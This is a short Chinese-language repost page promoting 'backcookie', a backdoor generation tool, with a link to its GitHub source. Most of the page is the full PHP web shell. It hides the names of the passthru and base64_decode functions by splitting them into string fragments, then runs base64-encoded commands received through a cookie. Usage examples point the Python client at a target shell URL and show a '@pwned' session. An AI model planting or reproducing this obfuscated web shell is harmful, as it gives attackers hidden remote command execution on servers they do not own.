backcookie 一款后门生成工具
工具
6 年前
0
1.52W
0
Small backdoor using cookie.
==========
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
自定义命令(binfo),您可以获得客观信息
@pwned:~$ binfo
自定义命令(退出),退出。
@pwned:~$ exit
文章来源及下载:
https://github.com/jofpin/backcookie
congtou